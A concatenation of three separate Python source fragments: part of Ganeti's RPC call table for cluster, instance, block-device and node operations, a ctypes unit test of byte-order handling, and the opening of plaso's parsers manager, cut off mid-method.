("instance_shutdown", SINGLE, None, constants.RPC_TMO_NORMAL, [
("instance", ED_INST_DICT, "Instance object"),
("timeout", None, None),
("reason", None, "The reason for the shutdown"),
], None, None, "Stops an instance"),
("instance_balloon_memory", SINGLE, None, constants.RPC_TMO_NORMAL, [
("instance", ED_INST_DICT, "Instance object"),
("memory", None, None),
], None, None, "Modify the amount of an instance's runtime memory"),
("instance_run_rename", SINGLE, None, constants.RPC_TMO_SLOW, [
("instance", ED_INST_DICT, "Instance object"),
("old_name", None, None),
("debug", None, None),
], None, None, "Run the OS rename script for an instance"),
("instance_migratable", SINGLE, None, constants.RPC_TMO_NORMAL, [
("instance", ED_INST_DICT, "Instance object"),
], None, None, "Checks whether the given instance can be migrated"),
("migration_info", SINGLE, None, constants.RPC_TMO_NORMAL, [
("instance", ED_INST_DICT, "Instance object"),
], None, None,
"Gather the information necessary to prepare an instance migration"),
("accept_instance", SINGLE, None, constants.RPC_TMO_NORMAL, [
("instance", ED_INST_DICT, "Instance object"),
("info", None, "Result for the call_migration_info call"),
("target", None, "Target hostname (usually an IP address)"),
], None, None, "Prepare a node to accept an instance"),
("instance_finalize_migration_dst", SINGLE, None, constants.RPC_TMO_NORMAL, [
("instance", ED_INST_DICT, "Instance object"),
("info", None, "Result for the call_migration_info call"),
("success", None, "Whether the migration was a success or failure"),
], None, None, "Finalize any target-node migration specific operation"),
("instance_migrate", SINGLE, None, constants.RPC_TMO_SLOW, [
("cluster_name", None, "Cluster name"),
("instance", ED_INST_DICT, "Instance object"),
("target", None, "Target node name"),
("live", None, "Whether the migration should be done live or not"),
], None, None, "Migrate an instance"),
("instance_finalize_migration_src", SINGLE, None, constants.RPC_TMO_SLOW, [
("instance", ED_INST_DICT, "Instance object"),
("success", None, "Whether the migration succeeded or not"),
("live", None, "Whether the user requested a live migration or not"),
], None, None, "Finalize the instance migration on the source node"),
("instance_get_migration_status", SINGLE, None, constants.RPC_TMO_SLOW, [
("instance", ED_INST_DICT, "Instance object"),
], None, _MigrationStatusPostProc, "Report migration status"),
("instance_start", SINGLE, None, constants.RPC_TMO_NORMAL, [
("instance_hvp_bep", ED_INST_DICT_HVP_BEP_DP, None),
("startup_paused", None, None),
("reason", None, "The reason for the startup"),
], None, None, "Starts an instance"),
("instance_os_add", SINGLE, None, constants.RPC_TMO_1DAY, [
("instance_osp", ED_INST_DICT_OSP_DP, "Tuple: (target instance,"
" temporary OS parameters"
" overriding configuration)"),
("reinstall", None, "Whether the instance is being reinstalled"),
("debug", None, "Debug level for the OS install script to use"),
], None, None, "Installs an operative system onto an instance"),
("hotplug_device", SINGLE, None, constants.RPC_TMO_NORMAL, [
("instance", ED_INST_DICT, "Instance object"),
("action", None, "Hotplug Action"),
("dev_type", None, "Device type"),
("device", ED_DEVICE_DICT, "Device dict"),
("extra", None, "Extra info for device (dev_path for disk)"),
("seq", None, "Device seq"),
], None, None, "Hoplug a device to a running instance"),
("hotplug_supported", SINGLE, None, constants.RPC_TMO_NORMAL, [
("instance", ED_INST_DICT, "Instance object"),
], None, None, "Check if hotplug is supported"),
("instance_metadata_modify", SINGLE, None, constants.RPC_TMO_URGENT, [
("instance", None, "Instance object"),
], None, None, "Modify instance metadata"),
]
_IMPEXP_CALLS = [
("import_start", SINGLE, None, constants.RPC_TMO_NORMAL, [
("opts", ED_OBJECT_DICT, None),
("instance", ED_INST_DICT, None),
("component", None, None),
("dest", ED_IMPEXP_IO, "Import destination"),
], None, None, "Starts an import daemon"),
("export_start", SINGLE, None, constants.RPC_TMO_NORMAL, [
("opts", ED_OBJECT_DICT, None),
("host", None, None),
("port", None, None),
("instance", ED_INST_DICT, None),
("component", None, None),
("source", ED_IMPEXP_IO, "Export source"),
], None, None, "Starts an export daemon"),
("impexp_status", SINGLE, None, constants.RPC_TMO_FAST, [
("names", None, "Import/export names"),
], None, _ImpExpStatusPostProc, "Gets the status of an import or export"),
("impexp_abort", SINGLE, None, constants.RPC_TMO_NORMAL, [
("name", None, "Import/export name"),
], None, None, "Aborts an import or export"),
("impexp_cleanup", SINGLE, None, constants.RPC_TMO_NORMAL, [
("name", None, "Import/export name"),
], None, None, "Cleans up after an import or export"),
("export_info", SINGLE, None, constants.RPC_TMO_FAST, [
("path", None, None),
], None, None, "Queries the export information in a given path"),
("finalize_export", SINGLE, None, constants.RPC_TMO_NORMAL, [
("instance", ED_INST_DICT, None),
("snap_disks", ED_FINALIZE_EXPORT_DISKS, None),
], None, None, "Request the completion of an export operation"),
("export_list", MULTI, None, constants.RPC_TMO_FAST, [], None, None,
"Gets the stored exports list"),
("export_remove", SINGLE, None, constants.RPC_TMO_FAST, [
("export", None, None),
], None, None, "Requests removal of a given export"),
]
_X509_CALLS = [
("x509_cert_create", SINGLE, None, constants.RPC_TMO_NORMAL, [
("validity", None, "Validity in seconds"),
], None, None, "Creates a new X509 certificate for SSL/TLS"),
("x509_cert_remove", SINGLE, None, constants.RPC_TMO_NORMAL, [
("name", None, "Certificate name"),
], None, None, "Removes a X509 certificate"),
]
_BLOCKDEV_CALLS = [
("bdev_sizes", MULTI, None, constants.RPC_TMO_URGENT, [
("devices", None, None),
], None, None,
"Gets the sizes of requested block devices present on a node"),
("blockdev_create", SINGLE, None, constants.RPC_TMO_NORMAL, [
("bdev", ED_SINGLE_DISK_DICT_DP, None),
("size", None, None),
("owner", None, None),
("on_primary", None, None),
("info", None, None),
("exclusive_storage", None, None),
], None, None, "Request creation of a given block device"),
("blockdev_convert", SINGLE, None, constants.RPC_TMO_SLOW, [
("bdev_src", ED_SINGLE_DISK_DICT_DP, None),
("bdev_dest", ED_SINGLE_DISK_DICT_DP, None),
], None, None,
"Request the copy of the source block device to the destination one"),
("blockdev_image", SINGLE, None, constants.RPC_TMO_SLOW, [
("bdev", ED_SINGLE_DISK_DICT_DP, None),
("image", None, None),
("size", None, None),
], None, None,
"Request to dump an image with given size onto a block device"),
("blockdev_wipe", SINGLE, None, constants.RPC_TMO_SLOW, [
("bdev", ED_SINGLE_DISK_DICT_DP, None),
("offset", None, None),
("size", None, None),
], None, None,
"Request wipe at given offset with given size of a block device"),
("blockdev_remove", SINGLE, None, constants.RPC_TMO_NORMAL, [
("bdev", ED_SINGLE_DISK_DICT_DP, None),
], None, None, "Request removal of a given block device"),
("blockdev_pause_resume_sync", SINGLE, None, constants.RPC_TMO_NORMAL, [
("disks", ED_DISKS_DICT_DP, None),
("pause", None, None),
], None, None, "Request a pause/resume of given block device"),
("blockdev_assemble", SINGLE, None, constants.RPC_TMO_NORMAL, [
("disk", ED_SINGLE_DISK_DICT_DP, None),
("instance", ED_INST_DICT, None),
("on_primary", None, None),
("idx", None, None),
], None, None, "Request assembling of a given block device"),
("blockdev_shutdown", SINGLE, None, constants.RPC_TMO_NORMAL, [
("disk", ED_SINGLE_DISK_DICT_DP, None),
], None, None, "Request shutdown of a given block device"),
("blockdev_addchildren", SINGLE, None, constants.RPC_TMO_NORMAL, [
("bdev", ED_SINGLE_DISK_DICT_DP, None),
("ndevs", ED_DISKS_DICT_DP, None),
], None, None,
"Request adding a list of children to a (mirroring) device"),
("blockdev_removechildren", SINGLE, None, constants.RPC_TMO_NORMAL, [
("bdev", ED_SINGLE_DISK_DICT_DP, None),
("ndevs", ED_DISKS_DICT_DP, None),
], None, None,
"Request removing a list of children from a (mirroring) device"),
("blockdev_close", SINGLE, None, constants.RPC_TMO_NORMAL, [
("instance_name", None, None),
("disks", ED_DISKS_DICT_DP, None),
], None, None, "Closes the given block devices"),
("blockdev_getdimensions", SINGLE, None, constants.RPC_TMO_NORMAL, [
("disks", ED_MULTI_DISKS_DICT_DP, None),
], None, None, "Returns size and spindles of the given disks"),
("drbd_disconnect_net", MULTI, None, constants.RPC_TMO_NORMAL, [
("disks", ED_DISKS_DICT_DP, None),
], None, None,
"Disconnects the network of the given drbd devices"),
("drbd_attach_net", MULTI, None, constants.RPC_TMO_NORMAL, [
("disks", ED_DISKS_DICT_DP, None),
("instance_name", None, None),
("multimaster", None, None),
], None, None, "Connects the given DRBD devices"),
("drbd_wait_sync", MULTI, None, constants.RPC_TMO_SLOW, [
("disks", ED_DISKS_DICT_DP, None),
], None, None,
"Waits for the synchronization of drbd devices is complete"),
("drbd_needs_activation", SINGLE, None, constants.RPC_TMO_NORMAL, [
("disks", ED_MULTI_DISKS_DICT_DP, None),
], None, None,
"Returns the drbd disks which need activation"),
("blockdev_grow", SINGLE, None, constants.RPC_TMO_NORMAL, [
("cf_bdev", ED_SINGLE_DISK_DICT_DP, None),
("amount", None, None),
("dryrun", None, None),
("backingstore", None, None),
("es_flag", None, None),
], None, None, "Request growing of the given block device by a"
" given amount"),
("blockdev_snapshot", SINGLE, None, constants.RPC_TMO_NORMAL, [
("cf_bdev", ED_SINGLE_DISK_DICT_DP, None),
("snap_name", None, None),
("snap_size", None, None),
], None, None, "Export a given disk to another node"),
("blockdev_rename", SINGLE, None, constants.RPC_TMO_NORMAL, [
("devlist", ED_BLOCKDEV_RENAME, None),
], None, None, "Request rename of the given block devices"),
("blockdev_find", SINGLE, None, constants.RPC_TMO_NORMAL, [
("disk", ED_SINGLE_DISK_DICT_DP, None),
], None, _BlockdevFindPostProc,
"Request identification of a given block device"),
("blockdev_getmirrorstatus", SINGLE, None, constants.RPC_TMO_NORMAL, [
("disks", ED_DISKS_DICT_DP, None),
], None, _BlockdevGetMirrorStatusPostProc,
"Request status of a (mirroring) device"),
("blockdev_getmirrorstatus_multi", MULTI, None, constants.RPC_TMO_NORMAL, [
("node_disks", ED_NODE_TO_DISK_DICT_DP, None),
], _BlockdevGetMirrorStatusMultiPreProc,
_BlockdevGetMirrorStatusMultiPostProc,
"Request status of (mirroring) devices from multiple nodes"),
("blockdev_setinfo", SINGLE, None, constants.RPC_TMO_NORMAL, [
("disk", ED_SINGLE_DISK_DICT_DP, None),
("info", None, None),
], None, None, "Sets metadata information on a given block device"),
]
_OS_CALLS = [
("os_diagnose", MULTI, None, constants.RPC_TMO_FAST, [], None, None,
"Request a diagnose of OS definitions"),
("os_validate", MULTI, None, constants.RPC_TMO_FAST, [
("required", None, None),
("name", None, None),
("checks", None, None),
("params", None, None),
("force_variant", None, None),
], None, None, "Run a validation routine for a given OS"),
("os_export", SINGLE, None, constants.RPC_TMO_FAST, [
("instance", ED_INST_DICT, None),
("override_env", None, None),
], None, None, "Export an OS for a given instance"),
]
_EXTSTORAGE_CALLS = [
("extstorage_diagnose", MULTI, None, constants.RPC_TMO_FAST, [], None, None,
"Request a diagnose of ExtStorage Providers"),
]
_NODE_CALLS = [
("node_has_ip_address", SINGLE, None, constants.RPC_TMO_FAST, [
("address", None, "IP address"),
], None, None, "Checks if a node has the given IP address"),
("node_info", MULTI, None, constants.RPC_TMO_URGENT, [
("storage_units", None,
"List of tuples '<storage_type>,<key>,[<param>]' to ask for disk space"
" information; the parameter list varies depending on the storage_type"),
("hv_specs", None,
"List of hypervisor specification (name, hvparams) to ask for node "
"information"),
], _NodeInfoPreProc, None, "Return node information"),
("node_verify", MULTI, None, constants.RPC_TMO_NORMAL, [
("checkdict", None, "What to verify"),
("cluster_name", None, "Cluster name"),
("all_hvparams", None, "Dictionary mapping hypervisor names to hvparams"),
("node_groups", None, "node names mapped to their group uuids"),
("groups_cfg", None,
"a dictionary mapping group uuids to their configuration"),
], None, None, "Request verification of given parameters"),
("node_volumes", MULTI, None, constants.RPC_TMO_FAST, [], None, None,
"Gets all volumes on node(s)"),
("node_demote_from_mc", SINGLE, None, constants.RPC_TMO_FAST, [], None, None,
"Demote a node from the master candidate role"),
("node_powercycle", SINGLE, ACCEPT_OFFLINE_NODE, constants.RPC_TMO_NORMAL, [
("hypervisor", None, "Hypervisor type"),
("hvparams", None, "Hypervisor parameters"),
], None, None, "Tries to powercycle a node"),
("node_configure_ovs", SINGLE, None, constants.RPC_TMO_NORMAL, [
("ovs_name", None, "Name of the OpenvSwitch to create"),
("ovs_link", None, "Link of the OpenvSwitch to the outside"),
], None, None, "This will create and setup the OpenvSwitch"),
("node_crypto_tokens", SINGLE, None, constants.RPC_TMO_NORMAL, [
("token_request", None,
"List of tuples of requested crypto token types, actions"),
], None, None, "Handle crypto tokens of the node."),
("node_ensure_daemon", MULTI, None, constants.RPC_TMO_URGENT, [
("daemon", None, "Daemon name"),
("run", None, "Whether the daemon should be running or stopped"),
], None, None, "Ensure daemon is running on the node."),
("node_ssh_key_add", MULTI, None, constants.RPC_TMO_URGENT, [
("node_uuid", None, "UUID of the node whose key is distributed"),
("node_name", None, "Name of the node whose key is distributed"),
("potential_master_candidates", None, "Potential master candidates"),
("ssh_port_map", None, "Map of nodes' SSH ports to be used for transfers"),
("to_authorized_keys", None, "Whether the node's key should be added"
" to all nodes' 'authorized_keys' file"),
("to_public_keys", None, "Whether the node's key should be added"
" to all nodes' public key file"),
("get_public_keys", None, "Whether the node should get the other nodes'"
" public keys")],
None, None, "Distribute a new node's public SSH key on the cluster."),
("node_ssh_key_remove", MULTI, None, constants.RPC_TMO_URGENT, [
("node_uuid", None, "UUID of the node whose key is removed"),
("node_name", None, "Name of the node whose key is removed"),
("master_candidate_uuids", None, "List of UUIDs of master candidates."),
("potential_master_candidates", None, "Potential master candidates"),
("ssh_port_map", None, "Map of nodes' SSH ports to be used for transfers"),
("from_authorized_keys", None,
"If the key should be removed from the 'authorized_keys' file."),
("from_public_keys", None,
"If the key should be removed from the public key file."),
("clear_authorized_keys", None,
"If the 'authorized_keys' file of the node should be cleared."),
("clear_public_keys", None,
"If the 'ganeti_pub_keys' file of the node should be cleared.")],
None, None, "Remove a node's SSH key from the other nodes' key files."),
("node_ssh_keys_renew", MULTI, None, constants.RPC_TMO_SLOW, [
("node_uuids", None, "UUIDs of the nodes whose key is renewed"),
("node_names", None, "Names of the nodes whose key is renewed"),
("ssh_port_map", None, "Map of nodes' SSH ports to be used for transfers"),
("master_candidate_uuids", None, "List of UUIDs of master candidates."),
("potential_master_candidates", None, "Potential master candidates")],
None, None, "Renew all SSH key pairs of all nodes nodes."),
]
_MISC_CALLS = [
("lv_list", MULTI, None, constants.RPC_TMO_URGENT, [
("vg_name", None, None),
], None, None, "Gets the logical volumes present in a given volume group"),
("vg_list", MULTI, None, constants.RPC_TMO_URGENT, [], None, None,
"Gets the volume group list"),
("bridges_exist", SINGLE, None, constants.RPC_TMO_URGENT, [
("bridges_list", None, "Bridges which must be present on remote node"),
], None, None, "Checks if a node has all the bridges given"),
("etc_hosts_modify", SINGLE, None, constants.RPC_TMO_NORMAL, [
("mode", None,
"Mode to operate; currently L{constants.ETC_HOSTS_ADD} or"
" L{constants.ETC_HOSTS_REMOVE}"),
("name", None, "Hostname to be modified"),
("ip", None, "IP address (L{constants.ETC_HOSTS_ADD} only)"),
], None, None, "Modify hosts file with name"),
("drbd_helper", MULTI, None, constants.RPC_TMO_URGENT, [],
None, None, "Gets DRBD helper"),
("restricted_command", MULTI, None, constants.RPC_TMO_SLOW, [
("cmd", None, "Command name"),
], None, None, "Runs restricted command"),
("run_oob", SINGLE, None, constants.RPC_TMO_NORMAL, [
("oob_program", None, None),
("command", None, None),
("remote_node", None, None),
("timeout", None, None),
], None, None, "Runs out-of-band command"),
("hooks_runner", MULTI, None, constants.RPC_TMO_NORMAL, [
("hpath", None, None),
("phase", None, None),
("env", None, None),
], None, None, "Call the hooks runner"),
("iallocator_runner", SINGLE, None, constants.RPC_TMO_NORMAL, [
("name", None, "Iallocator name"),
("idata", None, "JSON-encoded input string"),
("default_iallocator_params", None, "Additional iallocator parameters"),
], None, None, "Call an iallocator on a remote node"),
("test_delay", MULTI, None, _TestDelayTimeout, [
("duration", None, None),
], None, None, "Sleep for a fixed time on given node(s)"),
("hypervisor_validate_params", MULTI, None, constants.RPC_TMO_NORMAL, [
("hvname", None, "Hypervisor name"),
("hvfull", None, "Parameters to be validated"),
], None, None, "Validate hypervisor params"),
("get_watcher_pause", SINGLE, None, constants.RPC_TMO_URGENT, [],
None, None, "Get watcher pause end"),
("set_watcher_pause", MULTI, None, constants.RPC_TMO_URGENT, [
("until", None, None),
], None, None, "Set watcher pause end"),
("get_file_info", SINGLE, None, constants.RPC_TMO_FAST, [
("file_path", None, None),
], None, None, "Checks if a file exists and reports on it"),
]
CALLS = {
"RpcClientDefault":
_Prepare(_IMPEXP_CALLS + _X509_CALLS + _OS_CALLS + _NODE_CALLS +
_FILE_STORAGE_CALLS + _MISC_CALLS + _INSTANCE_CALLS +
_BLOCKDEV_CALLS + _STORAGE_CALLS + _EXTSTORAGE_CALLS),
"RpcClientJobQueue": _Prepare([
("jobqueue_update", MULTI, None, constants.RPC_TMO_URGENT, [
("file_name", None, None),
("content", ED_COMPRESS, None),
], None, None, "Update job queue file"),
("jobqueue_purge", SINGLE, None, constants.RPC_TMO_NORMAL, [], None, None,
"Purge job queue"),
("jobqueue_rename", MULTI, None, constants.RPC_TMO_URGENT, [
("rename", None, None),
], None, None, "Rename job queue file"),
("jobqueue_set_drain_flag", MULTI, None, constants.RPC_TMO_URGENT, [
("flag", None, None),
], None, None, "Set job queue drain flag"),
]),
"RpcClientBootstrap": _Prepare([
("node_start_master_daemons", SINGLE, None, constants.RPC_TMO_FAST, [
("no_voting", None, None),
], None, None, "Starts master daemons on a node"),
("node_activate_master_ip", SINGLE, None, constants.RPC_TMO_FAST, [
("master_params", ED_OBJECT_DICT, "Network parameters of the master"),
("use_external_mip_script", None,
"Whether to use the user-provided master IP address setup script"),
], None, None,
"Activates master IP on a node"),
("node_stop_master", SINGLE, None, constants.RPC_TMO_FAST, [], None, None,
"Deactivates master IP and stops master daemons on a node"),
("node_deactivate_master_ip", SINGLE, None, constants.RPC_TMO_FAST, [
("master_params", ED_OBJECT_DICT, "Network parameters of the master"),
("use_external_mip_script", None,
"Whether to use the user-provided master IP address setup script"),
], None, None,
"Deactivates master IP on a node"),
("node_change_master_netmask", SINGLE, None, constants.RPC_TMO_FAST, [
("old_netmask", None, "The old value of the netmask"),
("netmask", None, "The new value of the netmask"),
("master_ip", None, "The master IP"),
("master_netdev", None, "The master network device"),
], None, None, "Change master IP netmask"),
("node_leave_cluster", SINGLE, None, constants.RPC_TMO_NORMAL, [
("modify_ssh_setup", None, None),
], None, None,
"Requests a node to clean the cluster information it has"),
("master_node_name", MULTI, None, constants.RPC_TMO_URGENT, [], None, None,
"Returns the master node name"),
]),
"RpcClientDnsOnly": _Prepare([
("version", MULTI, ACCEPT_OFFLINE_NODE, constants.RPC_TMO_URGENT, [], None,
None, "Query node version"),
("node_verify_light", MULTI, None, constants.RPC_TMO_NORMAL, [
("checkdict", None, "What to verify"),
("cluster_name", None, "Cluster name"),
("hvparams", None, "Dictionary mapping hypervisor names to hvparams"),
("node_groups", None, "node names mapped to their group uuids"),
("groups_cfg", None,
"a dictionary mapping group uuids to their configuration"),
], None, None, "Request verification of given parameters"),
]),
"RpcClientConfig": _Prepare([
("upload_file", MULTI, None, constants.RPC_TMO_NORMAL, [
("file_name", ED_FILE_DETAILS, None),
], None, None, "Upload files"),
("upload_file_single", MULTI, None, constants.RPC_TMO_NORMAL, [
("file_name", None, "The name of the file"),
("content", ED_COMPRESS, "The data to be uploaded"),
("mode", None, "The mode of the file or None"),
("uid", None, "The owner of the file"),
("gid", None, "The group of the file"),
("atime", None, "The file's last access time"),
("mtime", None, "The file's last modification time"),
], None, None, "Upload files"),
("write_ssconf_files", MULTI, None, constants.RPC_TMO_NORMAL, [
("values", None, None),
], None, None, "Write ssconf files"),
]),
}
|
|
import sys, unittest, struct, math
from binascii import hexlify
from ctypes import *
def bin(s):
return hexlify(buffer(s)).upper()
# Each *simple* type that supports different byte orders has an
# __ctype_be__ attribute that specifies the same type in BIG ENDIAN
# byte order, and a __ctype_le__ attribute that is the same type in
# LITTLE ENDIAN byte order.
#
# For Structures and Unions, these types are created on demand.
class Test(unittest.TestCase):
def X_test(self):
print >> sys.stderr, sys.byteorder
for i in range(32):
bits = BITS()
setattr(bits, "i%s" % i, 1)
dump(bits)
def test_endian_short(self):
if sys.byteorder == "little":
self.failUnless(c_short.__ctype_le__ is c_short)
self.failUnless(c_short.__ctype_be__.__ctype_le__ is c_short)
else:
self.failUnless(c_short.__ctype_be__ is c_short)
self.failUnless(c_short.__ctype_le__.__ctype_be__ is c_short)
s = c_short.__ctype_be__(0x1234)
self.failUnlessEqual(bin(struct.pack(">h", 0x1234)), "1234")
self.failUnlessEqual(bin(s), "1234")
self.failUnlessEqual(s.value, 0x1234)
s = c_short.__ctype_le__(0x1234)
self.failUnlessEqual(bin(struct.pack("<h", 0x1234)), "3412")
self.failUnlessEqual(bin(s), "3412")
self.failUnlessEqual(s.value, 0x1234)
s = c_ushort.__ctype_be__(0x1234)
self.failUnlessEqual(bin(struct.pack(">h", 0x1234)), "1234")
self.failUnlessEqual(bin(s), "1234")
self.failUnlessEqual(s.value, 0x1234)
s = c_ushort.__ctype_le__(0x1234)
self.failUnlessEqual(bin(struct.pack("<h", 0x1234)), "3412")
self.failUnlessEqual(bin(s), "3412")
self.failUnlessEqual(s.value, 0x1234)
def test_endian_int(self):
if sys.byteorder == "little":
self.failUnless(c_int.__ctype_le__ is c_int)
self.failUnless(c_int.__ctype_be__.__ctype_le__ is c_int)
else:
self.failUnless(c_int.__ctype_be__ is c_int)
self.failUnless(c_int.__ctype_le__.__ctype_be__ is c_int)
s = c_int.__ctype_be__(0x12345678)
self.failUnlessEqual(bin(struct.pack(">i", 0x12345678)), "12345678")
self.failUnlessEqual(bin(s), "12345678")
self.failUnlessEqual(s.value, 0x12345678)
s = c_int.__ctype_le__(0x12345678)
self.failUnlessEqual(bin(struct.pack("<i", 0x12345678)), "78563412")
self.failUnlessEqual(bin(s), "78563412")
self.failUnlessEqual(s.value, 0x12345678)
s = c_uint.__ctype_be__(0x12345678)
self.failUnlessEqual(bin(struct.pack(">I", 0x12345678)), "12345678")
self.failUnlessEqual(bin(s), "12345678")
self.failUnlessEqual(s.value, 0x12345678)
s = c_uint.__ctype_le__(0x12345678)
self.failUnlessEqual(bin(struct.pack("<I", 0x12345678)), "78563412")
self.failUnlessEqual(bin(s), "78563412")
self.failUnlessEqual(s.value, 0x12345678)
def test_endian_longlong(self):
if sys.byteorder == "little":
self.failUnless(c_longlong.__ctype_le__ is c_longlong)
self.failUnless(c_longlong.__ctype_be__.__ctype_le__ is c_longlong)
else:
self.failUnless(c_longlong.__ctype_be__ is c_longlong)
self.failUnless(c_longlong.__ctype_le__.__ctype_be__ is c_longlong)
s = c_longlong.__ctype_be__(0x1234567890ABCDEF)
self.failUnlessEqual(bin(struct.pack(">q", 0x1234567890ABCDEF)), "1234567890ABCDEF")
self.failUnlessEqual(bin(s), "1234567890ABCDEF")
self.failUnlessEqual(s.value, 0x1234567890ABCDEF)
s = c_longlong.__ctype_le__(0x1234567890ABCDEF)
self.failUnlessEqual(bin(struct.pack("<q", 0x1234567890ABCDEF)), "EFCDAB9078563412")
self.failUnlessEqual(bin(s), "EFCDAB9078563412")
self.failUnlessEqual(s.value, 0x1234567890ABCDEF)
s = c_ulonglong.__ctype_be__(0x1234567890ABCDEF)
self.failUnlessEqual(bin(struct.pack(">Q", 0x1234567890ABCDEF)), "1234567890ABCDEF")
self.failUnlessEqual(bin(s), "1234567890ABCDEF")
self.failUnlessEqual(s.value, 0x1234567890ABCDEF)
s = c_ulonglong.__ctype_le__(0x1234567890ABCDEF)
self.failUnlessEqual(bin(struct.pack("<Q", 0x1234567890ABCDEF)), "EFCDAB9078563412")
self.failUnlessEqual(bin(s), "EFCDAB9078563412")
self.failUnlessEqual(s.value, 0x1234567890ABCDEF)
def test_endian_float(self):
if sys.byteorder == "little":
self.failUnless(c_float.__ctype_le__ is c_float)
self.failUnless(c_float.__ctype_be__.__ctype_le__ is c_float)
else:
self.failUnless(c_float.__ctype_be__ is c_float)
self.failUnless(c_float.__ctype_le__.__ctype_be__ is c_float)
s = c_float(math.pi)
self.failUnlessEqual(bin(struct.pack("f", math.pi)), bin(s))
# Hm, what's the precision of a float compared to a double?
self.failUnlessAlmostEqual(s.value, math.pi, 6)
s = c_float.__ctype_le__(math.pi)
self.failUnlessAlmostEqual(s.value, math.pi, 6)
self.failUnlessEqual(bin(struct.pack("<f", math.pi)), bin(s))
s = c_float.__ctype_be__(math.pi)
self.failUnlessAlmostEqual(s.value, math.pi, 6)
self.failUnlessEqual(bin(struct.pack(">f", math.pi)), bin(s))
def test_endian_double(self):
if sys.byteorder == "little":
self.failUnless(c_double.__ctype_le__ is c_double)
self.failUnless(c_double.__ctype_be__.__ctype_le__ is c_double)
else:
self.failUnless(c_double.__ctype_be__ is c_double)
self.failUnless(c_double.__ctype_le__.__ctype_be__ is c_double)
s = c_double(math.pi)
self.failUnlessEqual(s.value, math.pi)
self.failUnlessEqual(bin(struct.pack("d", math.pi)), bin(s))
s = c_double.__ctype_le__(math.pi)
self.failUnlessEqual(s.value, math.pi)
self.failUnlessEqual(bin(struct.pack("<d", math.pi)), bin(s))
s = c_double.__ctype_be__(math.pi)
self.failUnlessEqual(s.value, math.pi)
self.failUnlessEqual(bin(struct.pack(">d", math.pi)), bin(s))
def test_endian_other(self):
self.failUnless(c_byte.__ctype_le__ is c_byte)
self.failUnless(c_byte.__ctype_be__ is c_byte)
self.failUnless(c_ubyte.__ctype_le__ is c_ubyte)
self.failUnless(c_ubyte.__ctype_be__ is c_ubyte)
self.failUnless(c_char.__ctype_le__ is c_char)
self.failUnless(c_char.__ctype_be__ is c_char)
def test_struct_fields_1(self):
if sys.byteorder == "little":
base = BigEndianStructure
else:
base = LittleEndianStructure
class T(base):
pass
_fields_ = [("a", c_ubyte),
("b", c_byte),
("c", c_short),
("d", c_ushort),
("e", c_int),
("f", c_uint),
("g", c_long),
("h", c_ulong),
("i", c_longlong),
("k", c_ulonglong),
("l", c_float),
("m", c_double),
("n", c_char),
("b1", c_byte, 3),
("b2", c_byte, 3),
("b3", c_byte, 2),
("a", c_int * 3 * 3 * 3)]
T._fields_ = _fields_
# these fields do not support different byte order:
for typ in c_wchar, c_void_p, POINTER(c_int):
_fields_.append(("x", typ))
class T(base):
pass
self.assertRaises(TypeError, setattr, T, "_fields_", [("x", typ)])
def test_struct_struct(self):
# Nested structures with different byte order not (yet) supported
if sys.byteorder == "little":
base = BigEndianStructure
else:
base = LittleEndianStructure
class T(Structure):
_fields_ = [("a", c_int),
("b", c_int)]
class S(base):
pass
self.assertRaises(TypeError, setattr, S, "_fields_", [("s", T)])
def test_struct_fields_2(self):
# standard packing in struct uses no alignment.
# So, we have to align using pad bytes.
#
# Unaligned accesses will crash Python (on those platforms that
# don't allow it, like sparc solaris).
if sys.byteorder == "little":
base = BigEndianStructure
fmt = ">bxhid"
else:
base = LittleEndianStructure
fmt = "<bxhid"
class S(base):
_fields_ = [("b", c_byte),
("h", c_short),
("i", c_int),
("d", c_double)]
s1 = S(0x12, 0x1234, 0x12345678, 3.14)
s2 = struct.pack(fmt, 0x12, 0x1234, 0x12345678, 3.14)
self.failUnlessEqual(bin(s1), bin(s2))
def test_unaligned_nonnative_struct_fields(self):
if sys.byteorder == "little":
base = BigEndianStructure
fmt = ">b h xi xd"
else:
base = LittleEndianStructure
fmt = "<b h xi xd"
class S(base):
_pack_ = 1
_fields_ = [("b", c_byte),
("h", c_short),
("_1", c_byte),
("i", c_int),
("_2", c_byte),
("d", c_double)]
s1 = S()
s1.b = 0x12
s1.h = 0x1234
s1.i = 0x12345678
s1.d = 3.14
s2 = struct.pack(fmt, 0x12, 0x1234, 0x12345678, 3.14)
self.failUnlessEqual(bin(s1), bin(s2))
def test_unaligned_native_struct_fields(self):
if sys.byteorder == "little":
fmt = "<b h xi xd"
else:
base = LittleEndianStructure
fmt = ">b h xi xd"
class S(Structure):
_pack_ = 1
_fields_ = [("b", c_byte),
("h", c_short),
("_1", c_byte),
("i", c_int),
("_2", c_byte),
("d", c_double)]
s1 = S()
s1.b = 0x12
s1.h = 0x1234
s1.i = 0x12345678
s1.d = 3.14
s2 = struct.pack(fmt, 0x12, 0x1234, 0x12345678, 3.14)
self.failUnlessEqual(bin(s1), bin(s2))
if __name__ == "__main__":
unittest.main()
|
|
# -*- coding: utf-8 -*-
"""The parsers and plugins manager objects."""
import pysigscan
from plaso.frontend import presets
from plaso.lib import specification
class ParsersManager(object):
"""Class that implements the parsers manager."""
_parser_classes = {}
@classmethod
def DeregisterParser(cls, parser_class):
"""Deregisters a parser class.
The parser classes are identified based on their lower case name.
Args:
parser_class: the class object of the parser.
Raises:
KeyError: if parser class is not set for the corresponding name.
"""
parser_name = parser_class.NAME.lower()
if parser_name not in cls._parser_classes:
raise KeyError(u'Parser class not set for name: {0:s}.'.format(
parser_class.NAME))
del cls._parser_classes[parser_name]
@classmethod
def GetFilterListsFromString(cls, parser_filter_string):
"""Determines an include and exclude list of parser and plugin names.
Takes a comma separated string and splits it up into two lists,
of parsers, those to include and exclude from selection.
If a particular filter is prepended with a minus sign it will
be included in the exclude section, otherwise it is placed in the include.
Args:
parser_filter_string: The parser filter string.
Returns:
A tuple of two lists, include and exclude.
"""
includes = []
excludes = []
if not parser_filter_string:
return includes, excludes
preset_categories = presets.categories.keys()
for filter_string in parser_filter_string.split(u','):
filter_string = filter_string.strip()
if not filter_string:
continue
if filter_string.startswith(u'-'):
active_list = excludes
filter_string = filter_string[1:]
else:
active_list = includes
filter_string = filter_string.lower()
if filter_string in cls._parser_classes:
parser_class = cls._parser_classes[filter_string]
active_list.append(filter_string)
if parser_class.SupportsPlugins():
active_list.extend(parser_class.GetPluginNames())
elif filter_string in preset_categories:
active_list.extend(
presets.GetParsersFromCategory(filter_string))
else:
active_list.append(filter_string)
return includes, excludes
@classmethod
def GetParserFilterListsFromString(cls, parser_filter_string):
